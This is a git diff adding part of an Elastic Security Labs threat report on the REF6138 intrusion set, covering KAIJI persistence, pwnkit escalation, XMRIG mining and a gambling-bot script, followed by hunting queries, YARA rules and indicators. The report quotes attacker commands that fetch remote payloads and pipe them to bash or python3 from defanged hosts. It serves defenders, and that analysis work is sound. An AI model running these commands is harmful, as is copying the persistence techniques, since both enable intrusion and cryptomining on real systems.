+Next, KAIJI adjusts the `SELinux` policies to allow unauthorized actions. It searches audit logs for denied operations related to `System.img.conf`, generates a new `SELinux` policy to permit these actions, and installs the policy with elevated priority. By doing this, the malware bypasses security restrictions that would normally block its activity.
+
+Additionally, it sets up multiple further forms of persistence through bash profiles and creates two more malicious artifacts: `/usr/lib/libd1rpcld.so` and `/.img`.
+
+Right after, `/etc/crontab` is altered through an echo command, ensuring that the `/.img` file is executed by root on a set schedule.
+
+![KAIJI Dynamic Analysis - Part 4](/assets/images/betting-on-bots/image20.png "KAIJI Dynamic Analysis - Part 4")
+
+KAIJI continues to move several default system binaries to unusual locations, attempting to evade detection along the way.
+
+![KAIJI Dynamic Analysis - Part 5](/assets/images/betting-on-bots/image17.png "KAIJI Dynamic Analysis - Part 5")
+
+KAIJI uses the `renice` command to grant PID `2957`, one of KAIJI's planted executables, the highest possible priority (on a scale of -20 to 19, where the lowest value is the highest priority), ensuring it gets more CPU resources than other processes.
+
+To evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities by manipulating how directories are mounted and viewed within the system.
+
+Finally, we see a trace of `cron` executing `/.img`, which was planted in the `/etc/crontab` file earlier.
+
+## The saga continues
+
+Two weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the `www-data` user through the Apache2 process using the command:
+
+```
+sh -c wget http://91.92.241[.]103:8002/gk.php
+```
+
+The contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the attackers deploying `pspy64`. `Pspy` is a command-line tool for process snooping on Linux systems without requiring root permissions. It monitors running processes, including those initiated by other users, and captures events like cron job executions. This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing the commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for reconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities.
+
+Notably, `pspy64` was executed by the `[rcu_preempt]` parent, indicating that the threat actors had transitioned from leveraging the web server backdoor to using the GSOCKET backdoor.
+
+Further attempts at privilege escalation involved exploiting `CVE-2021-4034`, also known as `pwnkit`. This vulnerability affects the `pkexec` component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute arbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially leading to full control over the affected machine.
+
+### Custom built binaries
+
+Right after, the attackers attempted to download custom-built malware binaries named `apache2` and `apache2v86` from:
+
+* `http://62.72.22[.]91/apache2`
+* `http://62.72.22[.]91/apache2v86`
+
+We obtained copies of these files, which currently have zero detections on VirusTotal. However, when executing them dynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over the course of a week, the threat actor attempted to alter, upload, and execute these binaries more than 15 times, but due to repeated segfaults, it is unlikely that they succeeded in running this custom malware.
+
+While the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several XOR-encoded strings within the samples.
+
+![Apache2 XOR-Encoded Strings](/assets/images/betting-on-bots/image33.png "Apache2 XOR-Encoded Strings")
+
+The XOR key used to encode the strings was identified as `0x79` (or the character `y`). After decoding the strings, we discovered fragments of an HTTP request header that the malware was attempting to construct:
+
+```
+/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1
+sec-ch-ua: "Chromium";v="122", "Google Chrome";v="122", "Not-A.Brand";v="99
+sec-ch-ua-platform: "Windows"
+upgrade-insecure-requests: 1
+accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+referer: https://twitter[.]com
+accept-language: ru,en-US;q=0.9
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.
+```
+
+This indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature of the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or operational.
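+
+For reference, recovering such strings is straightforward once the single-byte key is known. The snippet below demonstrates the decoding with a placeholder value of our own rather than data taken from the sample:
+
+``` python
+KEY = 0x79  # single-byte XOR key, the ASCII character 'y'
+
+def xor_decode(data: bytes, key: int = KEY) -> bytes:
+    return bytes(b ^ key for b in data)
+
+# Round-trip demonstration with a placeholder string (not from the sample)
+encoded = xor_decode(b"referer: https://example.com")
+print(encoded.hex())
+print(xor_decode(encoded).decode())
+```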
+ +### Additional reconnaissance + +The attackers continued to use tools from The Hacker’s Choice, by downloading and executing [`whatserver.sh`](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh). + +This Shell script is designed to gather and display server information. It extracts details such as the fully qualified domain names (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like CPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities, including last logged-in users and currently listening services. + +### Mining activities + +After nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely having failed to gain root access. Instead, they established persistence as the `www-data` user, leveraging GSOCKET to set up an SSL connection, which was disguised as a kernel process called `[mm_percpu_wq]`. + +After decoding the base64 contents, we get a very familiar looking output: + +Through our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly into the crontab. + +This command tries to download `http://gcp.pagaelrescate[.]com:8080/ifindyou` every minute, and pipe it to bash. Looking at the contents of `ifindyou`, we see the following Bash script: + +![Stage 1 - ifindyou.sh](/assets/images/betting-on-bots/image8.png "Stage 1 - ifindyou.sh") + +This script gathers hostname and IP information, downloads the `SystemdXC` archive from `http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC` (XMRIG), stores this in `/tmp/SystemdXC`, extracts the archive and executes it with the necessary parameters to start mining Bitcoin. + +When examining the mining command, we can see how the malware configures XMRIG: + +This command connects to the `unmineable.com` mining pool, using the infected machine’s hostname as an identifier in the mining process. At the time of writing, there are 15 active workers mining Bitcoin for the wallet address `1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz`. + +![Bitcoin Address Lookup](/assets/images/betting-on-bots/image1.png "Bitcoin Address Lookup") + +Upon further investigation into the Bitcoin address, we found that this address has performed a single transaction. + +![Bitcoin Transaction](/assets/images/betting-on-bots/image32.png "Bitcoin Transaction") + +Interestingly, the output address for this transaction points to a well-known [hot wallet](https://www.ledger.com/academy/topics/security/hot-wallet-vs-cold-crypto-wallet-whats-the-difference) associated with Binance, indicating that the attackers may have transferred their mining earnings to an exchange platform. + +![Binance Wallet Destination](/assets/images/betting-on-bots/image10.png "Binance Wallet Destination") + +When returning our focus back to the script, we also see two commands commented out, which will become more clear later. The script executes: + +``` +curl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash +``` + +Looking at this payload, we can see the following contents: + +![Stage 2 - cycnet.sh](/assets/images/betting-on-bots/image23.png "Stage 2 - cycnet.sh") + +This stage checks the output of the command, and sends this to a Telegram chat bot. 
Through our Telegram behavioral rule, we can see that a Telegram POST request looks like this: + +The cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes: + +``` +curl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3 +``` + +The downloaded Python script automates interactions with an online gambling game through HTTP requests. The script includes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server. + +Upon closer examination, we identified the following key components of the script: + +**Global Variables:** + +* `usuario`: Stores the user ID for managing the session. +* `apuesta`: Represents the bet amount. +* `ganancias`: Tracks the winnings and losses. +* `saldo_actual`: Holds the current account balance. + +![enviador_slot Global Variables](/assets/images/betting-on-bots/image3.png "enviador_slot Global Variables") + +#### Understanding the `obteneruid` Function + +This function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote server. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful authentication, it returns a session UUID, which is used for further interactions in the game. + + +![enviador_slot obteneruid Function](/assets/images/betting-on-bots/image27.png "enviador_slot obteneruid Function") + +#### Understanding the `enviardatos` Function + +This function sends game data or status updates back to `gcp.pagaelrescate[.]com`, logging the results or actions taken during gameplay. It uses a simple GET request to transmit this data to the remote server. + +![enviador_slot enviardatos Function](/assets/images/betting-on-bots/image4.png "enviador_slot enviardatos Function") + +#### Understanding the `hacerjugada` Function + +The `hacerjugada` function simulates the betting process for a set number of rounds. It sends POST requests to place bets, updates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls `completarbono()` to handle any bonus game details. Between each betting round, the function enforces a 30-second delay to mimic natural gameplay and avoid detection. + +![enviador_slot hacerjugada Function](/assets/images/betting-on-bots/image28.png "enviador_slot hacerjugada Function") + +#### Understanding the `completarbono` Function + +When a bonus round is triggered, this function completes the round by sending a request containing the session ID and round ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is sent back to the remote server using the `enviardatos()` function. + +![enviador_slot completarbono Function](/assets/images/betting-on-bots/image6.png "enviador_slot completarbono Function") + +#### Likely Used for Testing Purposes + +It’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the gambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find vulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their approach, potentially in preparation for more sophisticated or widespread attacks. 
+
+## REF6138 through MITRE ATT&CK
+
+Elastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. During this investigation, we identified the following tactics, techniques and sub-techniques:
+
+*MITRE ATT&CK tactics, techniques and sub-techniques used*
+
+| Tactic | Technique | Sub-Technique |
+|----------------------|----------------------------------------------------|------------------------------------------------------------------------------------|
+| Resource Development | T1587: Develop Capabilities | Malware |
+| | T1588: Obtain Capabilities | Tool |
+| | T1608: Stage Capabilities | Upload Malware |
+| | | Upload Tool |
+| Initial Access | T1190: Exploit Public-Facing Application | |
+| Execution | T1059: Command and Scripting Interpreter | Unix Shell |
+| | | Python |
+| | T1053: Scheduled Task/Job | Cron |
+| Persistence | T1546: Event Triggered Execution | Unix Shell Configuration Modification |
+| | T1053: Scheduled Task/Job | Cron |
+| | T1505: Server Software Component | Web Shell |
+| Privilege Escalation | T1068: Exploitation for Privilege Escalation | |
+| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | |
+| | T1222: File and Directory Permissions Modification | Linux and Mac File and Directory Permissions Modification |
+| | T1564: Hide Artifacts | Hidden Files and Directories |
+| | T1070: Indicator Removal | Timestomp |
+| | T1036: Masquerading | Masquerade Task or Service |
+| | T1027: Obfuscated Files or Information | Software Packing |
+| | | Stripped Payloads |
+| | | Command Obfuscation |
+| | | Encrypted/Encoded File |
+| Discovery | T1057: Process Discovery | |
+| | T1082: System Information Discovery | |
+| | T1016: System Network Configuration Discovery | |
+| | T1049: System Network Connections Discovery | |
+| | T1007: System Service Discovery | |
+| Collection | T1119: Automated Collection | |
+| | T1005: Data from Local System | |
+| Command and Control | T1071: Application Layer Protocol | Web Protocols |
+| | T1132: Data Encoding | Standard Encoding |
+| | T1001: Data Obfuscation | |
+| | T1573: Encrypted Channel | Symmetric Cryptography |
+| | T1105: Ingress Tool Transfer | |
+| | T1571: Non-Standard Port | |
+| | T1572: Protocol Tunneling | |
+| | T1102: Web Service | |
+| Impact | T1496: Resource Hijacking | |
+
+## Detecting REF6138
+
+Elastic Security implements a multi-layer approach to threat detection, leveraging behavioral SIEM and Endpoint rules, YARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic Security that played a key role in capturing the identified threats.
+
+### Detection
+
+The following detection rules were observed throughout the analysis of this intrusion set:
+
+* [Segfault Detection](https://github.com/elastic/detection-rules/blob/main/rules_building_block/execution_linux_segfault.toml)
+* [Timestomping using Touch Command](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/defense_evasion_timestomp_touch.toml)
+* [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml)
+* [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml)
+
+### Prevention
+
+The following behavior prevention events were observed throughout the analysis of this intrusion set:
+
+* [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_suspicious_utility.toml)
+* [Defense Evasion via Bind Mount](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/defense_evasion_defense_evasion_via_bind_mount.toml)
+* [Linux Suspicious Child Process Execution via Interactive Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_suspicious_child_process_execution_via_interactive_shell.toml)
+* [Potential Linux Hack Tool Launched](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_potential_linux_hack_tool_launched.toml)
+* [Privilege Escalation via PKEXEC Exploitation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/privilege_escalation_privilege_escalation_via_pkexec_exploitation.toml)
+* [Potential SSH-IT SSH Worm Downloaded](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/lateral_movement_potential_ssh_it_ssh_worm_downloaded.toml)
+* [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml)
+
+The following YARA signatures are in place to detect the KAIJI and RUDEDEVIL malware samples, both on disk and in memory:
+
+* [Linux.Generic.Threat](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Generic_Threat.yar)
+* [Linux.Hacktool.Flooder](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Hacktool_Flooder.yar)
+
+The following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:
+
+* Potential Shell via Web Server
+* Potential Web Server Code Injection
+* Potential Shell Executed by Web Server User
+* Decode Activity via Web Server
+* Linux Telegram API Request
+* Suspicious Echo Execution
+
+### Hunting queries in Elastic
+
+The events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries can return a high volume of signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
+
+#### EQL queries
+
+Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the EQL queries below to hunt for similar behaviors:
+
+**Potential XMRIG Execution**
+
+The following EQL query can be used to hunt for XMRIG executions within your environment.
+
+```
+process where event.type == "start" and event.action == "exec" and (
+  (
+    process.args in ("-a", "--algo") and process.args in (
+      "gr", "rx/graft", "cn/upx2", "argon2/chukwav2", "cn/ccx", "kawpow", "rx/keva", "cn-pico/tlo", "rx/sfx", "rx/arq",
+      "rx/0", "argon2/chukwa", "argon2/ninja", "rx/wow", "cn/fast", "cn/rwz", "cn/zls", "cn/double", "cn/r", "cn-pico",
+      "cn/half", "cn/2", "cn/xao", "cn/rto", "cn-heavy/tube", "cn-heavy/xhv", "cn-heavy/0", "cn/1", "cn-lite/1",
+      "cn-lite/0", "cn/0"
+    )
+  ) or
+  (
+    process.args == "--coin" and process.args in ("monero", "arqma", "dero")
+  )
+) and process.args in ("-o", "--url")
+```
+
+**MSR Write Access Enabled**
+
+XMRIG leverages modprobe to enable write access to MSR. This activity is abnormal and should not occur by default.
+
+```
+process where event.type == "start" and event.action == "exec" and process.name == "modprobe" and
+process.args == "msr" and process.args == "allow_writes=on"
+```
+
+**Potential GSOCKET Activity**
+
+This activity is default behavior when deploying GSOCKET through the recommended deployment methods. Additionally, several arguments are added to the query to decrease the chances of missing a more customized intrusion through GSOCKET.
+
+```
+process where event.type == "start" and event.action == "exec" and
+process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and
+process.command_line : (
+"*GS_ARGS=*", "*gs-netcat*", "*gs-sftp*", "*gs-mount*", "*gs-full-pipe*", "*GS_NOINST=*", "*GSOCKET_ARGS=*", "*GS_DSTDIR=*", "*GS_URL_BASE=*", "*GS_OSARCH=*", "*GS_DEBUG=*", "*GS_HIDDEN_NAME=*", "*GS_HOST=*", "*GS_PORT=*", "*GS_TG_TOKEN=*", "*GS_TG_CHATID=*", "*GS_DISCORD_KEY=*", "*GS_WEBHOOK_KEY=*"
+)
+```
+
+**Potential Process Masquerading via Exec**
+
+GSOCKET leverages the `exec -a` method to run a process under a different name. GSOCKET specifically masquerades as kernel processes, but other malware may masquerade differently.
+
+```
+process where event.type == "start" and event.action == "exec" and
+process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "-c" and process.command_line : "* exec -a *"
+```
+
+**Renice or Ulimit Execution**
+
+Several malware families, including KAIJI and RUDEDEVIL, leverage the renice utility to change the priority of processes or to set resource limits for processes. This is commonly used by miner malware to increase the priority of mining processes and maximize mining performance.
+
+```
+process where event.type == "start" and event.action == "exec" and (
+  process.name in ("ulimit", "renice") or (
+    process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "-c" and
+    process.command_line : ("*ulimit*", "*renice*")
+  )
+)
+```
+
+**Inexistent Cron(d) Service Started**
+
+Both KAIJI and RUDEDEVIL establish persistence through the creation of a `cron(d)` service in `/etc/init.d/cron(d)`. `Cron`, by default, does not use a `SysV Init` service. Execution of a `cron(d)` service is suspicious and should be analyzed further.
+
+```
+process where event.type == "start" and event.action == "exec" and
+  process.name == "systemctl" and process.args == "start" and process.args in
+  ("cron.service", "crond.service", "cron", "crond")
+```
+
+**Suspicious /etc/ Process Execution from KAIJI**
+
+The `/etc/` directory is not a commonly used directory for process executions. 
KAIJI is known to place a binary called `32678` and a configuration file called `id.services.conf` in the `/etc/` directory to establish persistence and evade detection.
+
+```
+process where event.type == "start" and event.action == "exec" and (process.executable regex """/etc/[0-9].*""" or process.executable : ("/etc/*.conf", "/etc/.*"))
+```
+
+**Hidden File Creation in /dev/ directory**
+
+Creating hidden files in `/dev/` and `/dev/shm/` is not inherently malicious; however, this activity should be uncommon. KAIJI, GSOCKET and other malware such as `K4SPREADER` are known to drop hidden files in these locations.
+
+```
+file where event.type == "creation" and file.path : ("/dev/shm/.*", "/dev/.*")
+```
+
+**Suspicious Process Execution from Parent Executable in /boot/**
+
+Malware families such as KAIJI and XORDDOS are known to place executable files in the `/boot/` directory and leverage these to establish persistence while attempting to evade detection.
+
+```
+process where event.type == "start" and event.action == "exec" and process.parent.executable : "/boot/*"
+```
+
+#### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below is the YARA rule to identify the custom `Apache2` malware:
+
+```
+rule Linux_Trojan_Generic {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-20"
+        os = "Linux"
+        arch = "x86"
+        threat_name = "Linux.Trojan.Generic"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $enc1 = { 74 73 0A 1C 1A 54 1A 11 54 0C 18 43 59 5B 3A 11 0B 16 14 10 0C 14 5B }
+        $enc2 = { 18 1A 1A 1C 09 0D 43 59 0D 1C 01 0D 56 11 0D 14 15 55 18 09 09 15 10 }
+        $enc3 = { 18 1A 1A 1C 09 0D 54 15 18 17 1E 0C 18 1E 1C 43 59 0B 0C }
+        $enc4 = { 34 16 03 10 15 15 18 56 4C 57 49 59 51 2E 10 17 1D 16 0E 0A 59 37 }
+        $key = "yyyyyyyy"
+    condition:
+        1 of ($enc*) and $key
+}
+```
+
+To detect GSOCKET, including several of its adjacent tools, we created the following signature:
+
+```
+rule Multi_Hacktool_Gsocket {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-23"
+        os = "Linux, MacOS"
+        arch = "x86"
+        threat_name = "Multi.Hacktool.Gsocket"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $str1 = "gsocket: gs_funcs not found"
+        $str2 = "/share/gsocket/gs_funcs"
+        $str3 = "$GSOCKET_ARGS"
+        $str4 = "GSOCKET_SECRET"
+        $str5 = "GS_HIJACK_PORTS"
+        $str6 = "sftp -D gs-netcat"
+        $str7 = "GS_NETCAT_BIN"
+        $str8 = "GSOCKET_NO_GREETINGS"
+        $str9 = "GS-NETCAT(1)"
+        $str10 = "GSOCKET_SOCKS_IP"
+        $str11 = "GSOCKET_SOCKS_PORT"
+        $str12 = "gsocket(1)"
+        $str13 = "gs-sftp(1)"
+        $str14 = "gs-mount(1)"
+    condition:
+        3 of them
+}
+```
+
+Finally, the following signature was written to detect the [open source Ligolo-ng tool](https://github.com/nicocha30/ligolo-ng), as we have reason to believe this tool was used during this intrusion.
+
+
+```
+rule Linux_Hacktool_LigoloNG {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2024-09-20"
+        last_modified = "2024-09-20"
+        os = "Linux"
+        arch = "x86"
+        threat_name = "Linux.Hacktool.LigoloNG"
+        reference = "https://www.elastic.co/security-labs/betting-on-bots"
+        license = "Elastic License v2"
+
+    strings:
+        $a = "https://github.com/nicocha30/ligolo-ng"
+        $b = "@Nicocha30!"
+ $c = "Ligolo-ng %s / %s / %s" + condition: + all of them +} +``` + +### Defensive recommendations + +To effectively defend against malware campaigns and minimize the risk of intrusion, it’s crucial to implement a multi-layered approach to security. Here are some key defensive measures you should prioritize: + +1. **Keep Your Elastic Detection Rules Updated and Enabled**: Ensure that your security tools, including any pre-built detection rules, are up to date. Continuous updates allow your systems to detect the latest malware signatures and behaviors. +2. **Enable Prevention Mode in Elastic Defend**: Configure Elastic Defend in prevention mode to automatically block known threats rather than just alerting on them. Prevention mode ensures proactive defense against malware and exploits. +3. **Monitor Alerts and Logs**: Regularly monitor alerts, logs, and servers for any signs of suspicious activity. Early detection of unusual behavior can help prevent a small breach from escalating into a full-blown compromise. +4. **Conduct Threat Hunting**: Proactively investigate your environment for hidden threats that may have evaded detection. Threat hunting can uncover advanced attacks and persistent malware that bypass traditional security measures. +5. **Implement Web Application Firewalls (WAFs)**: Use a WAF to block unauthorized or malicious traffic. A properly configured firewall can prevent many common web attacks. +6. **Enforce Strong Authentication for SSH**: Use public/private key authentication for SSH access to protect against brute force attacks. +7. **Write Secure Code**: Ensure that all custom software, especially web server technology, follows secure coding practices. Engaging professional security auditors to review your code can help identify and mitigate vulnerabilities before they are exploited. +8. **Regularly Patch and Update Systems**: Keeping servers, applications, and software up to date is essential to defending against known vulnerabilities. Prompt patching minimizes the risk of being targeted by off-the-shelf exploits. + +By following these recommendations, you can significantly reduce the attack surface and strengthen your defense against ongoing or potential malware threats. + +## Observations + +The following observables were discussed in this research. These are available for download in STIX or ECS format [here](https://github.com/elastic/labs-releases/tree/main/indicators/ref6138). 
+ +| Observable | Type | Name | Reference | +|-------------------------------------------------------------------------------------------------|-------------|------------------------|------------------------------------| +| 72ac2877c9e4cd7d70673c0643eb16805977a9b8d55b6b2e5a6491db565cee1f | SHA-256 | SystemdXC | XMRIG | +| 82c55c169b6cb5e348be6e202163296b2b5d80fff2be791c21da9a8b84188684 | SHA-256 | apache2 | apache2_unpacked | +| 0fede7231267afc03b096ee6c1d3ded479b10ab235e260120bc9f68dd1fc54dd | SHA-256 | apache2_upx_packed | apache2_upx_packed | +| 9ee695e55907a99f097c4c0ad4eb24ae5cf3f8215e9904d787817f1becb9449e | SHA-256 | download.sh | KAIJI Stager | +| 1cdfb522acb1ad0745a4b88f072e40bf9aa113b63030fe002728bac50a46ae79 | SHA-256 | linux_386 | KAIJI x86 | +| d0ef2f020082556884361914114429ed82611ef8de09d878431745ccd07c06d8 | SHA-256 | linux_amd64 | KAIJI x64 | +| ad36cf59b5eb08799a50e9aece6f12cdfe8620062606ac6684d3b4509acc681b | SHA-256 | linux_arm5 | KAIJI ARM5 | +| 792a84a5bc8530285e2f6eb997054edb3d43460a99a089468e2cf81b5fd5cde6 | SHA-256 | linux_arm6 | KAIJI ARM6 | +| e19fb249db323d2388e91f92ff0c8a7a169caf34c3bdaf4d3544ce6bfb8b88b4 | SHA-256 | linux_arm64 | KAIJI ARM64 | +| 3847c06f95dd92ec482212116408286986bb4b711e27def446fb4a524611b745 | SHA-256 | linux_arm7 | KAIJI ARM7 | +| fffee23324813743b8660282ccd745daa6fb058f2bf84b9960f70d888cd33ba0 | SHA-256 | linux_mips | KAIJI MIPS | +| 6d40b58e97c7b4c34f7b5bdac88f46e943e25faa887e0e6ce5f2855008e83f55 | SHA-256 | linux_mips64 | KAIJI MIPS64 | +| 0c3442b8c49844a1ee41705a9e4a710ae3c7cde76c69c2eab733366b2aa34814 | SHA-256 | linux_mips64el | KAIJI MIPS64 little-endian | +| 310973f6f186947cb7cff0e7b46b4645acdd71e90104f334caa88a4fa8ad9988 | SHA-256 | linux_mips_softfloat | KAIJI MIPS softfloat | +| 0d24a2e7da52bad03b0bda45c8435a29c4e1c9b483e425ae71b79fd122598527 | SHA-256 | linux_mipsel | KAIJI MIPS little-endian | +| 36fc8eef2e1574e00ba3cf9e2267d4d295f6e9f138474e3bd85eb4d215f63196 | SHA-256 | linux_mipsel_softfloat | KAIJI MIPS little-endian softfloat | +| 3c25a4406787cc5089e83e00350e49eb9f192d03d69e7a61b780b6828db1344f | SHA-256 | linux_ppc64 | KAIJI PPC64 | +| 7c16149db7766c6fd89f28031aa123408228f045e90aa03828c02562d9f9d1d7 | SHA-256 | linux_ppc64el | KAIJI PPC64 little-endian | +| 09f935acbac36d224acfb809ad82c475d53d74ab505f057f5ac40611d7c3dbe7 | SHA-256 | l64_v0 | RUDEDEVIL/LUFICER x64 version 0 | +| ea0068702ea65725700b1dad73affe68cf29705c826d12a497dccf92d3cded46 | SHA-256 | l64_v1 | RUDEDEVIL/LUFICER x64 version 1 | +| 160f232566968ade54ee875def81fc4ca69e5507faae0fceb5bef6139346496a | SHA-256 | l64_v2 | RUDEDEVIL/LUFICER x64 version 2 | +| 89b60cedc3a4efb02ceaf629d6675ec9541addae4689489f3ab8ec7741ec8055 | SHA-256 | l64_v3 | RUDEDEVIL/LUFICER x64 version 3 | +| 20899c5e2ecd94b9e0a8d1af0114332c408fb65a6eb3837d4afee000b2a0941b | SHA-256 | l86_v0 | RUDEDEVIL/LUFICER x86 version 0 | +| 728dce11ffd7eb35f80553d0b2bc82191fe9ff8f0d0750fcca04d0e77d5be28c | SHA-256 | l86_v1 | RUDEDEVIL/LUFICER x86 version 1 | +| 47ceca049bfcb894c9a229e7234e8146d8aeda6edd1629bc4822ab826b5b9a40 | SHA-256 | l86_v2 | RUDEDEVIL/LUFICER x86 version 2 | +| e89f4073490e48aa03ec0256d0bfa6cf9c9ac6feb271a23cb6bc571170d1bcb5 | SHA-256 | l86_v3 | RUDEDEVIL/LUFICER x86 version 3 | +| d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60 | SHA-256 | hjvhg.exe | Miner | +| 54a5c82e4c68c399f56f0af6bde9fb797122239f0ebb8bcdb302e7c4fb02e1de | SHA-256 | mvhhvcp3.exe | DONUT LOADER | +| 9e32be17b25d3a6c00ebbfd03114a0947361b4eaf4b0e9d6349cbb95350bf976 | SHA-256 | vdfgb.exe | Miner | 
+| http://gcp.pagaelrescate[.]com:8080/ifindyou | url | ifindyou.sh | Stage 1 | +| http://gcp.pagaelrescate[.]com:8080/cycnet | url | cycnet.sh | Stage 2 | +| http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | url | Enviador_slot.py | Stage 3 | +| http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC | url | SystemdXC | XMRIG | +| http://38.54.125[.]192:8080/nginx-rc | url | nginx-rc | LIGOLO-NG | +| http://62.72.22[.]91/apache2 | url | apache2 | Custom Malware | +| http://62.72.22[.]91/apache2v86 | url | apache2v86 | Custom Malware | +| http://91.92.241[.]103:8002/gk.php | url | gk.php | PHP Backdoor | +| http://hfs.t1linux[.]com:7845/scdsshfk | url | scdsshfk | XMRIG | +| gcp.pagaelrescate[.]com | domain-name | | REF Hosting domain | +| nishabii[.]xyz | domain-name | | RUDEDEVIL C2 | +| 3.147.53[.]183 | ipv4-addr | | Python Reverse Shell C2 | +| 38.54.125[.]192 | ipv4-addr | | C2 Server | +| 107.178.101[.]245 | ipv4-addr | | Malware File Server (Rejetto) | +| 62.72.22[.]91 | ipv4-addr | | Server Hosting Malware | +| 91.92.241[.]103 | ipv4-addr | | C2 Server | +| 61.160.194[.]160 | ipv4-addr | | Server Hosting Malware | +| 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet | +| 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc | XMR Wallet | | RUDEDEVIL/LUFICER mining wallet | +| 1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz | BTC Wallet | | XMRIG mining wallet | + +## References + +The following were referenced throughout the above research: + +* [https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html](https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html) +* [https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/) +* [https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities](https://www.fortinet.com/blog/threat-research/multiple-threats-target-adobe-coldfusion-vulnerabilities) +* [https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/](https://www.aquasec.com/blog/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack/) +* [https://github.com/hackerschoice/gsocket](https://github.com/hackerschoice/gsocket) \ No newline at end of file diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/beyond_the_wail.md 